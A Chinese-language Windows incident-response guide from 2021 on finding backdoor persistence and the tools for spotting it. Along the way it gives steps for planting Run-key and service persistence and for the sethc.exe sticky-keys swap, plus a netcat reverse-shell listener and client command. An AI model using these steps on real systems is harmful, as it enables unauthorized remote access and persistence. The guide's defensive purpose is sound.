【应急响应】Windows系统下应急响应排查方法（一）

windows后门排查

windows后门启动方式

1、用户启动目录

C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

C:\用户\用户名\AppData\Roaming\Microsoft\Windows\[开始] 菜单\程序\启动

2、系统服务方式启动【修改注册表，注册成某项服务，然后启动】

1、win+R，输入services.msc，打开"服务"面板
2、在“服务”面板中查看是否有异常命名的服务项
3、右键"属性"可以看到恶意启动项文件名及关闭删除服务项
4、注册表中也可以定位到异常服务的启动文件【win+R-->regedit】
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[服务名]\Parameters
到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[服务名]之后右键新建一个项，项名称就是Parameters，右键新建一个字符串值为Application，然后数值数据添加可执行文件的路径

3、开机启动项(msconfig)

注册表(regedit)路径：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce
HKEY_CURRENT_USER\Software\Micorsoft\Windows\Currentversion\Run

【创建一个注册表值】
右键创建一个项，然后添加项名称，右键添加一个字符串值（名称自己定），把要启动的文件路径贴入
查看是否有异常启动项，如有就进行分析并删除.

4、计划任务启动项

桌面右键“我的电脑”、点击“管理”，找到“计划任务”
在“任务计划程序”中可以看到任务状态，时段内有哪些计划任务在执行.
任务计划程序
|__任务计划程序库 //可以看到所有的计划任务程序.

5、组策略-登录脚本(gpedit.msc)

Win + R，运行中输入"gpedit.msc"打开组策略，计算机配置/用户配置 → Windows设置 → 脚本.
一般来说，计算机配置中"启动"与"关机"、用户配置中"登录"与"注销"，默认是不会添加脚本的，如果有，那大概率就是有问题了。

6、程序替换（shift后门）

在系统登录界面，连按5次shift触发粘贴键功能，所以将其替换为cmd.exe，替换之后登录界面连按5次shift将直接唤醒cmd命令框

常见的是替换Shift程序为cmd程序，连续按五下Shift键触发
文件路径：C:\WINDOWS\system32\sethc.exe

实现：将C:\WINDOWS\system32\底下的sethc.exe换成cmd.exe即可

windows后门关键技术

1、反弹程序

攻击机：
nc -lvvp 1234
受控主机：
nc [ip] 1234 -e c:\windows\system32\cmd.exe

2、代码注入【恶意代码注入别的进程，以多加一个线程的方式运行】

• 代码注入是一种向目标进程插入独立运行代码并使之运行的技术，其一般调用CreateRemoteThread() API以远程线程的形式运行插入的代码，亦称为线程注入。
• 代码以线程过程（ThreadProcedure）形式插入，而代码中使用的数据则以线程参数的形式插入，即代码和数据是分别注入的

3、DLL注入【Powerful Dllinjor】

• DLL注入技术，一般来讲是向一个正在运行的进程插入/注入代码的过程。我们注入的代码以动态链接库（DLL）的形式存在。
DLL文件在运行时将按需加载（类似于UNIX系统中的共享库）。

4、驱动隐藏

• 驱动技术涉及Windows内核操作。在Windows内核中，各种数据（包括文件列表、进程列表
• 网络连接等）都是以链表形式存在的，如果将需要隐藏的文件、端口、进程、网络连接从链表上
摘掉，那么常规文件管理器、进程管理器等软件就无法查看到。但是操作内核链表需要Ring0级
别的程序，这类程序最多的表现形式就是系统的驱动程序（.sys）。

Windows后门程序排查

1、Autoruns

Autoruns是SysInternals工具集中简单易用一个小工具，其主要功能是管理Windows中的各种启动项。
颜色标识：
粉红色：没有签名或者签名信息失效
黄色：启动项文件不在【一般主动关注黄色】

2、PCHunter 【类似火绒剑】

3、ProcessMonitor

4、tcpview

这里优先推荐[火绒剑]，其次推荐[Autoruns]，[PCHunter/XueTr]可能在新版本系统中会报错驱动不存在；【火绒剑，优先注意那些没有公司名和安全状态为未知的(没数字签名)启动项、服务、驱动、网络进程等】
【火绒剑，还可以监控进程的动作】
【Autoruns，粉红色代表没有数字签名/签名不匹配，黄色代表启动项文件不存在，以及无公司名/提供商】
【TCPView，可以查看程序的端口进程情况，以及快速定位到恶意文件的路径与PID等情况】
【CurrPorts，主要用来监听当前正在进行和新增的联接，打开LogChanges(记录日志)，可在日志中查看新增情况】

by 久违 2021.1.26